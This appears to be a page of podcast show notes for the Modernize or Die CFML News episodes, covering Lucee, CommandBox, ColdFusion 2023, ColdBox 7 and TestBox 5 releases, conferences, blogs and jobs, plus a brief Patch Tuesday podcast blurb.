Remember - Lucee's minors are MAJOR releases. The Lucee team is proud to present our next release candidate for the 5.x series. The 5.4 series bumps the minor version (from 5.3), as we had to update some of the underlying Java libraries and extensions because the older versions have CVEs or are no longer maintained. All of the Java libraries which have been updated in 6 have also been updated in 5.4, with the exception of hsqldb, which in this RC is still 2.7.0. This includes an important performance fix with logging since 5.3.10.120 (fixed in 5.3.10.125).
https://dev.lucee.org/t/lucee-5-4-0-65-release-candidate/12657

CommandBox Next - Add Rewrite Map feature similar to Apache
- Add a new rewrite-map() handler which declares a named map, the file it uses (absolute path), and a case-sensitivity flag
- Add a new rewrite-map-exists() predicate, just for the fun of it, which will tell you if a given key exists in the map (Apache doesn't have this)
- Add a new %{map:name-name:mapKey|defaultValue} exchange attribute which mostly follows Apache's syntax. The only limitation is that nested exchange attributes must use [] instead of {}, due to an Undertow parsing issue I reported to them yesterday.
https://ortussolutions.atlassian.net/browse/COMMANDBOX-1592
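If you haven't met Apache-style rewrite maps before: a rewrite map is a named key/value table consulted during URL rewriting, with an optional fallback, so the semantics of the `%{map:...:key|default}` attribute are roughly a dictionary lookup with a default. A Python analogy of those semantics (illustrative only; see the ticket above for CommandBox's actual syntax):

```python
# Rough semantics of a rewrite map: a named key/value table with a default.
REWRITE_MAP = {"old-blog": "/articles", "old-shop": "/store"}

def lookup(key: str, default: str = "/") -> str:
    """Mirrors %{map:name:key|default}: mapped value, or the fallback."""
    return REWRITE_MAP.get(key, default)

print(lookup("old-blog"))          # /articles
print(lookup("nope"))              # /   (the |default branch)
print("old-shop" in REWRITE_MAP)   # what rewrite-map-exists() would test
```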
CommandBox - Have your say on MariaDB
During my refactoring of Runwar/CommandBox, I was looking at the little MariaDB4j integration that was built into Runwar (added about 7 years ago, in 2016). There were never first-class settings for it in CommandBox, so you would have had to use the runwar.args setting to activate it. It also required you to include the MariaDB4j jars yourself in the classpath. (Note this is separate from the MariaDB CommandBox module Jan Janek made.)

The settings it supported were:
- enable
- port
- base directory
- data directory
- SQL file to import

So my question is: does anyone use the built-in MariaDB4j integration in Runwar? If I removed it, would anyone care? If I put in first-class settings and documented it, would people use it? Does it sound useful? Worthless?
https://community.ortussolutions.com/t/mariadb4j-support-in-commandbox-runwar/9666

ICYMI - Adobe ColdFusion 2023 released!!!!
We are thrilled to announce the highly anticipated release of Adobe ColdFusion 2023! Packed with cutting-edge features and enhanced performance, this release takes ColdFusion to new heights of innovation. Experience accelerated development, robust security measures, and seamless integration with modern technologies. From rapid application development to scalable enterprise solutions, Adobe ColdFusion empowers developers to build dynamic web applications with ease. Discover the limitless possibilities and stay ahead in the digital era. Upgrade to the latest version now and harness the true potential of ColdFusion. Elevate your coding experience with Adobe ColdFusion – the ultimate platform for unmatched productivity and success.
- LDAP and SAML integration
- Central Configuration Server
- GraphQL client
- HTML to PDF
- Cloud Services
- JWT integration in CF
What's new - https://helpx.adobe.com/coldfusion/using/whats-new.html
https://coldfusion.adobe.com/2023/05/coldfusion2023-release/

Webinar / Meetups and Workshops

Online CF Meetup - "The Many Ways to Run CF (and Lucee)", with Charlie Arehart
Thursday June 8th - 12pm US Eastern Time
Depending on your experience, you may tend to favor running CF and your CFML the way you've "always done it" (perhaps by installing CF, or perhaps via CommandBox). But did you know there are in fact several ways to deploy CF (or Lucee), including ways to run CFML without even needing to do that? In this session, veteran CF consultant Charlie Arehart will identify these, starting first with WHY it's useful to have different ways to be able to deploy CF/Lucee and CFML. Then he will discuss and demonstrate those several ways--whether you prefer to run CF on your own machine or another (whether hosted or in the cloud), to include even being able to run CFML WITHOUT need of CF (or Lucee) being "installed" at all. He will cover such topics as installers (GUI and console-based), silent installation (and updates), CommandBox, WAR file deployment, container-based (Docker/Kubernetes) deployment, serverless deployment, as well as CLI-based execution of CFML, and execution via cffiddle and trycf, among others. Buckle up, buttercup, for a fast tour of this varied landscape.
https://www.meetup.com/coldfusionmeetup/events/293987033/

"OctoPerf: The Load Testing Tool for Modern Web Apps", Guillaume Betailloux
Thursday June 15th at 12pm US Eastern Time, UTC-4
OctoPerf offers an integrated development interface that you can use from any browser to execute load tests against your application.
Find out how you can set up a full-blown test campaign with meaningful user journeys in under 20 minutes.
https://www.meetup.com/coldfusionmeetup/events/294018310/

Adobe Upcoming Events

Adobe ColdFusion Workshop
WEDNESDAY, JUNE 21, 2023, 9:00 AM CEST - Online Event
https://adobe-coldfusion-1day-workshop.meetus.adobeevents.com/

Webinar - Adobe ColdFusion (2023 release) in Docker on Google Cloud Platform
FRIDAY, JUNE 23, 2023, 10:00 AM PDT - Online Event
https://docker-gcp-coldfusion.meetus.adobeevents.com/

Adobe ColdFusion Workshop
WEDNESDAY, JUNE 28, 2023, 9:00 AM EDT - Online Event
https://aodbe-coldfusion-1daytraining.meetus.adobeevents.com/

Webinar - Road to Fortuna Series: New Administrator Features in Adobe ColdFusion 2023
WEDNESDAY, JULY 26, 2023, 10:00 AM PDT - Online Event
https://administrator-features-adobe-coldfusion.meetus.adobeevents.com/

Adobe ColdFusion Workshop
WEDNESDAY, AUGUST 9, 2023, 9:00 AM EDT - Online Event
https://adobecf-1day-workshop.meetus.adobeevents.com/

Webinar - Road to Fortuna Series: Exploring the New Google Cloud Platform Features
FRIDAY, AUGUST 25, 2023, 10:00 AM PDT - Online Event
https://google-cloud-platform-adobe-coldfusion.meetus.adobeevents.com/

CFCasts Content Updates
https://www.cfcasts.com

Recent Releases
- 2023 ForgeBox Module of the Week Series - 1 new video: https://cfcasts.com/series/2023-forgebox-modules-of-the-week
- 2023 VS Code Hint Tip and Trick of the Week Series - 1 new video: https://cfcasts.com/series/2023-vs-code-hint-tip-and-trick-of-the-week

Watch sessions from previous ITB years
- Into the Box 2022 - https://cfcasts.com/series/itb-2022
- Into the Box 2021 - https://cfcasts.com/series/into-the-box-2021
- Into the Box 2020 - https://cfcasts.com/series/itb-2020
- Into the Box 2019 - https://cfcasts.com/series/into-the-box-2019

Coming Soon
- Into the Box 2023 videos will soon be available for purchase as an EXCLUSIVE PREMIUM package. Subscribers will get access to premium packages after a 6-month exclusive window.
- More ForgeBox and VS Code podcast snippet videos
- ColdBox Elixir from Eric
- Getting Started with Inertia.js from Eric

Conferences and Training

CFCamp - Pre-Conference - Ortus has 4 Trainings
June 21st, 2023
Held at the CFCamp venue at the Marriott Hotel Munich Airport in Freising.
- Eric - TestBox: Getting started with BDD-TDD Oh My!
- Luis - ColdBox 7 - from zero to hero
- Dan - Legacy Code Conversion To The Modern World
- Brad - CommandBox Server Deployment for the Modern Age
https://www.cfcamp.org/pre-conference.html

CF Camp Pre Conference Workshop Discount
We can offer a 30% discount by using the code "OrtusPre30". Thank you for your ongoing support!
https://www.eventbrite.com/e/cfcamp-pre-conference-workshops-by-ortus-solutions-tickets-641489421127
Brad's Video - https://www.youtube.com/watch?v=oD4JBOmIL2E
Luis's Video - https://www.youtube.com/watch?v=F1_8xhHjJMM

CFCamp
June 22-23rd, 2023
Marriott Hotel Munich Airport, Freising
Check out all the great sessions: https://www.cfcamp.org/sessions.html
Check out all the great speakers: https://www.cfcamp.org/cfcamp-conference-2023/speakers.html
Register now: https://www.cfcamp.org/

THAT Conference
Howdy.
We're a full-stack, tech-obsessed community of fun, code-loving humans who share and learn together.We geek-out in Texas and Wisconsin once a year but we host digital events all the time.WISCONSIN DELLS, WI / JULY 24TH - 27TH, 2022A four-day summer camp for developers passionate about learning all things mobile, web, cloud, and technology.https://that.us/events/wi/2023/Our very own Daniel Garcia is speaking there https://that.us/activities/R3eAGT1NfIlAOJd2afY7Adobe CF Summit WestLas Vegas 2-4th of October.Get your early bird passes now. Session passes @ $99 Professional passes @ $199. Early bird open only till June 15th, 2023!Call for Speakers is OPENhttps://cfsummit.adobeevents.com/ https://cfsummit.adobeevents.com/speaker-application/Ortus Training - ColdBox Zero to HeroOctober 4th and 5thVenue Confirmation in Progress - will be less than 2 miles from the Mirage.Registration will be open soon!More conferencesNeed more conferences, this site has a huge list of conferences for almost any language/community.https://confs.tech/Blogs, Tweets, and Videos of the Week5/28/23 - Blog - Ben Nadel - Code Kata: Simple Dependency Injection (DI) With ColdFusionWhen this blog boots-up, I explicitly wire-together all of the ColdFusion components that get cached in memory. The domain model for this blog isn't very big, so configuring the application right in the onApplicationStart() event-handler isn't much of a lift. That said, as a fun code kata - as much as anything else - I wanted to start migrating the configuration over to use more declarative dependencies. To that end, I wanted to build myself a simple dependency injection (DI) container.https://www.bennadel.com/blog/4469-code-kata-simple-dependency-injection-di-with-coldfusion.htm 6/1/23 - Blog - Ben Nadel - The 16th Annual Regular Expression Day - June 1st 2023It's that time of year again! The days are getting longer; the weather is getting nicer; the babies are all being born at the zoo; and, people are going bonkers over the undeniable power of Regular Expression pattern matching! Which must mean, it's Regular Expression Day! This is the time of year in which we take a moment to reflect on how much better off we are having patterns in our lives. And in celebration of that, I'm going to learn something new about using Regular Expressions in JavaScript: named capture groups.https://www.bennadel.com/blog/4471-the-16th-annual-regular-expression-day-june-1st-2023.htm 6/3/23 - Blog - Ben Nadel - Using Nested Locks To Synchronize Background Data Cleanup In ColdFusionAs I'm building out the Dig Deep Fitness MVP, I'm having to implement functionality that I might ordinarily implement in a more robust fashion given better resources (ie, when someone else is paying for the servers). For example, I would normally use Redis to build a one-time token service. But, when writing the same functionality exclusively in ColdFusion, I have to get a little more low-level when implementing the locking (that Redis would normally apply). 
Specifically, I wanted to think about how to handle locking when I have a background process that needs to clean-up and expunge expired data.https://www.bennadel.com/blog/4472-using-nested-locks-to-synchronize-background-data-cleanup-in-coldfusion.htm 6/5/23 - Tweet - HTMX.org - HTMX threw some shade on Allaire ColdFusion - let's speak up!how many young web developers today can even conceive of a world so based that technology logos could look like this & nobody cringed?people wore this stuff on tee shirts, unembarassed, walking around, living in the moment, high fivingnever forget what they took from youhttps://twitter.com/htmx_org/status/1665728145511657476?s=20.6/6/23 - Blog - Ben Nadel - Building A Magic Link Passwordless Login In ColdFusionAs I build out the Dig Deep Fitness MVP (Minimum Viable Product), I'm trying to do the least amount of work that allows me to start delivering actual value. So, when it comes to user authentication, I didn't want to create a robust account management system. Instead, I ended up building a passwordless login system using magic links. I wanted to share my approach in ColdFusion in case anyone has suggestions on how to improve it or harden it against attacks.https://www.bennadel.com/blog/4473-building-a-magic-link-passwordless-login-in-coldfusion.htm 6/6/23 - Blog - Michael Born - Ortus Solutions - Introducing: The Ortus ORM ExtensionWe are excited to announce the Ortus ORM Extension, a new effort to improve the CFML ecosystem by modernizing Hibernate ORM support on the Lucee CFML server. The Ortus ORM extension is an open-source fork of the Lucee Hibernate extension and is a leap forward in modernizing native support for the Hibernate ORM engine in (Lucee) CFML applications. It also is another addition to our professional open-source offerings, so this extension will be professionally supported under any of our support plans and can also be supported by the community via our Patreon program.https://www.ortussolutions.com/blog/introducing-the-ortus-orm-extension CFML JobsSeveral positions available on https://www.getcfmljobs.com/Listing over 71 ColdFusion positions from 47 companies across 34 locations in 5 Countries.3 new jobs listed this weekFull-Time - ColdFusion Developer at Hyderabad, Telangana - India Company: Purview ServicesPosted Jun 05https://www.getcfmljobs.com/jobs/index.cfm/india/ColdFusion-Developer-at-Hyderabad-Telangana/11579 Full-Time - Application Developer at Lawrence, Kansas - United States Company: Kansas Geological Survey - Kansas UniversityPosted May 27https://www.getcfmljobs.com/jobs/index.cfm/united-states/CFApplicationDev-at-Lawrence-KS/11578 Full-Time - Lucee/ColdFusion Developer at United States - United States Company: BatesvillePosted May 26https://www.getcfmljobs.com/jobs/index.cfm/united-states/LuceeColdFusion-Developer-at-United-States/11577 Other Job Links KGS at Kansas University https://employment.ku.edu/jobs/staff/application-developer/25131br There is a jobs channel in the CFML slack team, and in the Box team slack now too ForgeBox Module of the WeekCBOpenAICBOPENAI is a module that provides a simple API to access OpenAI's variety of AI services. Grant's presentation: https://docs.google.com/presentation/d/1xXlGBs_kNZhrAgS8xxJ4T5NFev2nH4FAaZ3DXYt8wqQ/edit#slide=id.p1 https://www.forgebox.io/view/cbopenai VS Code Hint Tips and Tricks of the WeekVSCODE POWER MODE!!!Power Mode is one of the most requested extensions for VS Code. 
Unfortunately, they said it couldn't be done...However, after seeing this list and realizing that VS Code was the only modern editor without it, I knew I had to try. I couldn't let VS Code live in the shadow of its big brother or Atom.I present you, VSCODE POWER MODE!!! (now with atom-like explosions and an improved combo meter!)https://github.com/hoovercj/vscode-power-mode Thank you to all of our Patreon SupportersThese individuals are personally supporting our open source initiatives to ensure the great toolings like CommandBox, ForgeBox, ColdBox,  ContentBox, TestBox and all the other boxes keep getting the continuous development they need, and funds the cloud infrastructure at our community relies on like ForgeBox for our Package Management with CommandBox. You can support us on Patreon here https://www.patreon.com/ortussolutionsDon't forget, we have Annual Memberships, pay for the year and save 10% - great for businesses. Bronze Packages and up, now get a ForgeBox Pro and CFCasts subscriptions as a perk for their Patreon Subscription. All Patreon supporters have a Profile badge on the Community Website All Patreon supporters have their own Private Forum access on the Community Website All Patreon supporters have their own Private Channel access BoxTeam Slack https://community.ortussolutions.com/Top Patreons () John Wilson - Synaptrix Tomorrows Guides Jordan Clark Gary Knight Mario Rodrigues Giancarlo Gomez  David Belanger   Dan Card Jeffry McGee - Sunstar Media Dean Maunder Nolan Erck  Abdul Raheen Kevin Wright - Big thanks for Kevin Wright who just made a huge BUMP to their Patreon Pledge Amount And many more PatreonsYou can see an up to date list of all sponsors on Ortus Solutions' Websitehttps://ortussolutions.com/about-us/sponsors Thanks everyone!!! ★ Support this podcast on Patreon ★

AVLEONOV Podcast
Ep.87 - Microsoft Patch Tuesday May 2023: Microsoft Edge, BlackLotus Secure Boot SFB, OLE RCE, Win32k EoP, NFS RCE, PGM RCE, LDAP RCE, SharePoint RCE

AVLEONOV Podcast

Play Episode Listen Later May 28, 2023 8:08


Hello everyone! This episode will be about Microsoft Patch Tuesday for May 2023, including vulnerabilities that were added between the April and May Patch Tuesdays. It's been a long time since we've had such a tiny Patch Tuesday: 57 CVEs counting those that appeared during the month, and only 38 without them!

Modernize or Die ® Podcast - CFML News Edition
Modernize or Die® - CFML News Podcast for May 23rd, 2023 - Episode 196

Modernize or Die ® Podcast - CFML News Edition

Play Episode Listen Later May 23, 2023 73:43


2023-05-23 Weekly News - Episode 196
Watch the video version on YouTube at https://youtube.com/live/3F5all2U5Pk?feature=share
Hosts:
- Gavin Pickin - Senior Developer at Ortus Solutions
- Dan Card - Senior Developer at Ortus Solutions

Thanks to our Sponsor - Ortus Solutions
The makers of ColdBox, CommandBox, ForgeBox, TestBox and all your favorite box-es out there. A few ways to say thanks back to Ortus Solutions:
- Like and subscribe to our videos on YouTube.
- Help Ortus reach for the stars - star and fork our repos. Star all of your GitHub Box dependencies from CommandBox with https://www.forgebox.io/view/commandbox-github
- Subscribe to our podcast on your podcast apps and leave us a review.
- Sign up for a free or paid account on CFCasts, which is releasing new content every week.
- BOXLife store: https://www.ortussolutions.com/about-us/shop
- Buy Ortus's books: 102 ColdBox HMVC Quick Tips and Tricks on Gumroad (http://gum.co/coldbox-tips); Learn Modern ColdFusion (CFML) in 100+ Minutes - free online at https://modern-cfml.ortusbooks.com/ or buy an ebook or paper copy at https://www.ortussolutions.com/learn/books/coldfusion-in-100-minutes

Patreon Support (proficient)
We have 40 patreons: https://www.patreon.com/ortussolutions

News and Announcements
Adobe ColdFusion 2023 released!!!!
We are thrilled to announce the highly anticipated release of Adobe ColdFusion 2023! Packed with cutting-edge features and enhanced performance, this release takes ColdFusion to new heights of innovation. Experience accelerated development, robust security measures, and seamless integration with modern technologies. From rapid application development to scalable enterprise solutions, Adobe ColdFusion empowers developers to build dynamic web applications with ease. Discover the limitless possibilities and stay ahead in the digital era. Upgrade to the latest version now and harness the true potential of ColdFusion. Elevate your coding experience with Adobe ColdFusion – the ultimate platform for unmatched productivity and success.
- LDAP and SAML integration
- Central Configuration Server
- GraphQL client
- HTML to PDF Cloud Services
- JWT integration in CF
What's new - https://helpx.adobe.com/coldfusion/using/whats-new.html
https://coldfusion.adobe.com/2023/05/coldfusion2023-release/

ICYMI - Into the Box - Recap
- Keynote - Day 1 - https://t.co/42DozsZ0G9
- Keynote - Day 2 - https://youtube.com/live/TOhOaNVy0dM
- Sessions
- Hands-on Pre-Conference
- Happy Box Hackathon

New Releases and Updates
Lots of releases - so many! We are still waiting on the blogs and release notes for a lot of them, but ITB came with ColdBox 7, CommandBox 5.9, TestBox 5, CBWIRE 3, TestBox CLI, ColdBox CLI, Quick, qb, CBQ v1 and v2, cbDebugger 3, and ContentBox 6. We will discuss some of them below.

ColdBox 7 Released
ColdBox 7 has been released! Install it via ForgeBox using `coldbox`. Released at ITB 2023! What's new with ColdBox 7.0.0?
- Engine Support
- ColdBox CLI
- WireBox Updates
- Transient Request Cache
- Delegators
- Property Observers
- Lazy Properties
- New `onInjectorMissingDependency` event
- Population Enhancements (including mass assignment protection)
- Hierarchical Injectors (for Module Dependencies)
- Module Config Object Override files
- App Mode Helpers
- `redirectBack` included as `back`
- `DateTimeHelper` component
- Whoops! Upgrades
- More data for development REST exception responses
- JSON Pretty Printing in LogBox Output
- Exception Pretty Printing in LogBox Output
- Combine `canXXX` checks with logging using callback functions
- `event.setRequestTimeout()` - useful for testing
https://coldbox.ortusbooks.com/v/7.x/intro/release-history/whats-new-with-7.0.0

CBWIRE 3.0.0 Released
We are very excited to announce the release of version 3 of CBWIRE, our ColdBox module that makes building modern, reactive apps a breeze. This version brings with it a new component syntax, 19 enhancements and bug fixes, and improved documentation. Our biggest goal with this release was to improve the developer experience and to provide a low barrier to entry for getting started with CBWIRE.
https://www.ortussolutions.com/blog/cbwire-300-released

TestBox v5.0.0 Released!
We are excited to announce the release of TestBox version 5, which brings a host of new features and improvements for developers. TestBox is a powerful and flexible tool that helps developers write comprehensive BDD/TDD tests for their applications, ensuring code quality and reducing the likelihood of bugs and errors. With TestBox v5, developers can take advantage of new features such as batch code coverage testing, improved reporting capabilities, method spies, and better integration with other tools in the Ortus suite. These new features make TestBox even more versatile and user-friendly, and provide developers with a powerful tool for building high-quality, reliable applications.
https://www.ortussolutions.com/blog/testbox-v500-released

FusionReactor 10 released, May 18
If you're using FusionReactor, note that a new version 10 (10.0.0) released yesterday, May 18. While it's a new major release number, most of the items listed as new aren't really things that you will "see" as changed in the interface. I don't quite want to call it just "plumbing"--the folks had their reasons to regard the new and changed features as warranting the major version number increase.
https://www.carehart.org/blog/2023/5/19/fusionreactor_10_0_released/
https://docs.fusion-reactor.com/release-notes/

ColdBox CLI 1.x Released
We are thrilled to announce the release of our new ColdBox CLI tool! This powerful command-line interface is designed to help developers streamline their workflows and simplify their ColdBox development experience. With its intuitive syntax and powerful capabilities, the ColdBox CLI tool allows developers to easily create, test, and deploy ColdBox applications with just a few simple commands. Whether you are a seasoned ColdBox developer or just getting started with this powerful framework, the ColdBox CLI tool is the perfect addition to your toolkit. This tool used to be embedded in the CommandBox core, but it now has a new home (https://github.com/ColdBox/coldbox-cli) and can have its own life-cycles, including LTS support for our ColdBox framework as well.
https://www.ortussolutions.com/blog/coldbox-cli-1x-released

ICYMI - TestBox CLI 1.x Released
We're excited to unveil our latest TestBox CLI tool! This robust command-line interface is specifically crafted to assist developers in streamlining their workflows and enhancing their TestBox BDD/TDD development process. Boasting an intuitive syntax and potent functionalities, the TestBox CLI tool empowers developers to create, test, and generate reports on their ColdFusion (CFML) applications with ease, using only a handful of commands. Whether you're a seasoned ColdFusion (CFML) developer or a newcomer to this potent framework, the TestBox CLI tool is a valuable asset to add to your toolkit. This tool used to be embedded in the CommandBox core, but it now has a new home (https://github.com/ortus-solutions/testbox-cli) and can have its own life-cycles.
https://www.ortussolutions.com/blog/testbox-cli-1x-released

New Ortus-supported ORM extension for Lucee.
Other releases: cbDebugger 3, ContentBox 6.

Webinar / Meetups and Workshops
POSTPONED - Adobe - Road to Fortuna Series: ColdFusion 2023 in Docker on Google Cloud Platform
May 23, 2023 - MAYBE IN JUNE - 10 AM - 11 AM PT
During this GCP-centric webinar, Mark Takata will explore how to run a containerized ColdFusion 2023 server on Google Cloud Platform's Kubernetes-powered containerization system. He will demonstrate how the powerful new Google Cloud Platform features added to ColdFusion 2023 can help optimize application development, provisioning and delivery. This will be the first time ColdFusion 2023 will be shown running in containers publicly, and the session is designed to showcase the ease of working in this popular method of software delivery.
Speaker - Mark Takata - ColdFusion Technical Evangelist, Adobe
https://docker-gcp-coldfusion.meetus.adobeevents.com/

CFCasts Content Updates
https://www.cfcasts.com
Recent Releases
- 2023 ForgeBox Module of the Week Series - 1 new video: https://cfcasts.com/series/2023-forgebox-modules-of-the-week
- 2023 VS Code Hint, Tip, and Trick of the Week Series - 1 new video: https://cfcasts.com/series/2023-vs-code-hint-tip-and-trick-of-the-week
- Just added: 2019 Into the Box videos
Watch sessions from previous ITB years
- Into the Box 2022 - https://cfcasts.com/series/itb-2022
- Into the Box 2021 - https://cfcasts.com/series/into-the-box-2021
- Into the Box 2020 - https://cfcasts.com/series/itb-2020
- Into the Box 2019 - https://cfcasts.com/series/into-the-box-2019
Coming Soon
- Into the Box 2023 videos will soon be available for purchase as an EXCLUSIVE PREMIUM package. Subscribers will get access to premium packages after a 6-month exclusive window.
- More ForgeBox and VS Code podcast snippet videos
- ColdBox Elixir from Eric
- Getting Started with Inertia.js from Eric
- 10 Testing Techniques by Dan?
- Feature Testing and Deployment with Docker by Dan?

Conferences and Training
ICYMI - Into the Box 2023 - 10th Edition
May 17-19, 2023. The conference was held in The Woodlands (Houston), Texas. This year we continued the tradition of training, offering a pre-conference hands-on training day on May 17th and our live Mariachi Band Party! We are back to our spring schedule and beautiful weather in The Woodlands! Also, 2023 marks our 10-year anniversary, so we might have two live bands and much more!!! IN PERSON ONLY.
https://intothebox.org
https://itb2023.eventbrite.com/
Can't wait? Watch videos from the last 4 years on CFCasts:
- Into the Box 2022 - https://cfcasts.com/series/itb-2022
- Into the Box 2021 - https://cfcasts.com/series/into-the-box-2021
- Into the Box 2020 - https://cfcasts.com/series/itb-2020
- Into the Box 2019 - https://cfcasts.com/series/into-the-box-2019

THIS WEEK - VueConf.us
NEW ORLEANS, LA • MAY 24-26, 2023. Jazz. Code. Vue.
Workshop day: May 24. Main conference: May 25-26.
https://vueconf.us/

CFCamp - Pre-Conference - Ortus has 4 Trainings
June 21st, 2023, held at the CFCamp venue at the Marriott Hotel Munich Airport in Freising.
- Eric - TestBox: Getting Started with BDD-TDD, Oh My!
- Luis - ColdBox 7 - From Zero to Hero
- Dan - Legacy Code Conversion to the Modern World
- Brad - CommandBox Server Deployment for the Modern Age
https://www.cfcamp.org/pre-conference.html

CFCamp
June 22-23rd, 2023, Marriott Hotel Munich Airport, Freising
Check out all the great sessions: https://www.cfcamp.org/sessions.html
Check out all the great speakers: https://www.cfcamp.org/cfcamp-conference-2023/speakers.html
Register now: https://www.cfcamp.org/

THAT Conference
Howdy. We're a full-stack, tech-obsessed community of fun, code-loving humans who share and learn together. We geek out in Texas and Wisconsin once a year, but we host digital events all the time.
WISCONSIN DELLS, WI / JULY 24TH - 27TH, 2023
A four-day summer camp for developers passionate about learning all things mobile, web, cloud, and technology.
https://that.us/events/wi/2023/
Our very own Daniel Garcia is speaking there: https://that.us/activities/R3eAGT1NfIlAOJd2afY7

Adobe CF Summit West
Las Vegas, 2nd-4th of October. Get your early bird passes now. Session passes @ $99, Professional passes @ $199. Only till May 31st, 2023!
Can you spot ME - Gavin - apparently I'm in 3 of the photos!
Call for Speakers is OPEN
https://cfsummit.adobeevents.com/
https://cfsummit.adobeevents.com/speaker-application/

Ortus Training - ColdBox Zero to Hero
Dates and venue: TBA.

More conferences
Need more conferences? This site has a huge list of conferences for almost any language/community: https://confs.tech/

Blogs, Tweets, and Videos of the Week
5/10/23 - Blog - Ben Nadel - Using BugSnag As A Server-Side Logging Service In ColdFusion
I've been on the lookout for a better error logging service; and, over on Facebook, Jay Bronson recommended that I look at BugSnag. They have a free tier, so I signed up to try it out. And, I must say, I'm very pleased with the user interface (UI) and the basic functionality. That said, I could not get the Java SDK (Software Development Kit) working with JavaLoader. As such, I hacked together some ColdFusion code that would do just enough to send data to the BugSnag API. What I have is far from feature complete; but, I thought it might be worth sharing.
https://www.bennadel.com/blog/4462-using-bugsnag-as-a-server-side-logging-service-in-coldfusion.htm

5/11/23 - Blog - Luis Majano - TestBox v5.0.0 Released!
We are excited to announce the release of TestBox version 5, which brings a host of new features and improvements for developers. TestBox is a powerful and flexible tool that helps developers write comprehensive BDD/TDD tests for their applications, ensuring code quality and reducing the likelihood of bugs and errors. With TestBox v5, developers can take advantage of new features such as batch code coverage testing, improved reporting capabilities, method spies, and better integration with other tools in the Ortus suite. These new features make TestBox even more versatile and user-friendly, and provide developers with a powerful tool for building high-quality, reliable applications.
https://www.ortussolutions.com/blog/testbox-v500-released

5/12/23 - Blog - Brian - Why You Don't Want To Use CFMX_COMPAT Encryption
This is the first of what may be a couple of posts about my presentation from ColdFusion Summit East 2023, which was held in April in Washington, DC. Let's talk about ColdFusion and encryption - specifically, about the CFMX_COMPAT algorithm. The encrypt() function was introduced in ColdFusion 4 (ca. November 1998), and CFMX_COMPAT was the only algorithm available. The release of ColdFusion 7 (ca. February 2005) added native support for AES, 3DES, DES, and Blowfish. But CFMX_COMPAT remains the default algorithm used by the encrypt() function.
https://hoyahaxa.blogspot.com/2023/05/why-you-dont-want-to-use-cfmxcompat.html

5/13/23 - Blog - Nolan Erck - Speaking at Into The Box 2023
It's official... next week I'll be speaking at Into The Box in Houston! If you're not already familiar with it, Into The Box is the most modern-leaning conference for CFML! But really, the CFML-specific portion is complemented by a heavy dose of content that is applicable to many other platforms. A quick look at the agenda will show you sessions ranging from web security, to AWS pub/sub mechanisms, to OAuth and more!
https://southofshasta.com/blog/speaking-at-into-the-box-2023/

5/14/23 - Blog - Ben Nadel - Maintaining White Space Using jSoup And ColdFusion
jSoup is a Java library for parsing and manipulating HTML strings. For the last few years, I've been using jSoup to clean up and normalize my blog posts. And now, I'm looking to use jSoup to help me transform and cache GitHub Gists. At the time of this writing, Gist code is rendered in HTML with cells that use white-space: pre as the means of controlling white space output. jSoup doesn't parse the CSS; so, it doesn't understand that it needs to maintain this white space when serializing the document back into HTML. If we want to keep this white space in the resultant document, we have to disable pretty printing.
https://www.bennadel.com/blog/4463-maintaining-white-space-using-jsoup-and-coldfusion.htm

5/16/23 - Blog - Adobe ColdFusion Portal - Introducing the 2023 Release of Adobe ColdFusion
We are thrilled to announce the highly anticipated release of Adobe ColdFusion 2023! Packed with cutting-edge features and enhanced performance, this release takes ColdFusion to new heights of innovation.
https://coldfusion.adobe.com/2023/05/coldfusion2023-release/

5/16/23 - Blog - Luis Majano - Ortus Solutions - ColdBox 7.0.0 Released
Introducing ColdBox 7: Revolutionizing Web Development with Cutting-Edge Features and Unparalleled Performance. We are thrilled to announce the highly anticipated release of ColdBox 7, the latest version of the acclaimed web development HMVC framework for ColdFusion (CFML). ColdBox 7 introduces groundbreaking features and advancements, elevating the development experience to new heights and empowering developers to create exceptional web applications and APIs. Designed to meet the evolving needs of modern web development, ColdBox 7 boasts a range of powerful features that streamline the development process and enhance productivity. With its robust HMVC architecture and developer-friendly tools, ColdBox 7 enables developers to deliver high-performance, scalable, and maintainable web applications and APIs with ease.
https://www.ortussolutions.com/blog/coldbox-700-released

5/16/23 - Blog - Ben Nadel - Parsing GitHub Gist Embeds Into A Normalized Data Structure Using jSoup In ColdFusion
As I mentioned yesterday, I've been using GitHub Gists to add the syntax highlighting / formatting in my blog post content. This has been working great; but, I've never liked the idea of having to reach out to a 3rd-party system at render time in order to provide my full content experience. As such, I've been considering ways to cache the GitHub Gist data locally (in my system) for both better control and better performance. Unfortunately, GitHub Gists aren't provided in the most user-friendly format. To that end, we can use jSoup in ColdFusion to read in, parse, and normalize the Gist contents.
https://www.bennadel.com/blog/4464-parsing-github-gist-embeds-into-a-normalized-data-structure-using-jsoup-in-coldfusion.htm

5/16/23 - Blog - Nolan Erck - My Into The Box 2023 Schedule
Into The Box 2023 starts tomorrow! After a flight that included several delays, I finally arrived at the hotel a few minutes ago. As per usual, there is a ton of great content this year; deciding which sessions to attend is like the techie equivalent of Sophie's Choice! Here's my best guess as to where you can find me: Wednesday - Async Programming & Scheduling workshop.
https://southofshasta.com/blog/my-into-the-box-2023-schedule/

5/17/23 - Blog - Charlie Arehart - ColdFusion 2023 released, May 17 2023: resources and thoughts
ColdFusion 2023 was released today, May 17 2023. For more on the many features, see the following several Adobe blog posts and the substantial documentation resources they also released today, about which I offer some additional comment below. I also discuss changes in OS support (saving you having to compare the docs discussing that), as well as the change to CF2023 running on Java 17 (which you could miss, as it's not highlighted by Adobe in any of the announcement resources). I also discuss changes in the licensing document/EULA (again, to save you having to do that comparison), as well as an observation about pricing (it has not changed since CF2021). I also discuss some migration considerations and close by pointing out the Hidden Gems in CF2023 talk that I did, based on the prerelease. I plan to update that in time based on this final release.
https://www.carehart.org/blog/2023/5/17/cf2023_released/

5/18/23 - Blog - Ben Nadel - Using CSS Flexbox To Create A Simple Bar Chart In ColdFusion
I'm a huge fan of CSS Flexbox layouts. They're relatively simple to use and there's not much to remember in terms of syntax. One place that I love using Flexbox is when I need to create a simple bar chart. I don't do much charting in my work, so I never have need to pull in large, robust libraries like D3. But, for simple one-off visualizations, CSS Flexbox is my jam. I thought it might be worth sharing a demo of how I do this in ColdFusion.
https://www.bennadel.com/blog/4466-using-css-flexbox-to-create-a-simple-bar-chart-in-coldfusion.htm

5/18/23 - Blog - Charlie Arehart - FusionReactor 10 released, May 18: resources and thoughts
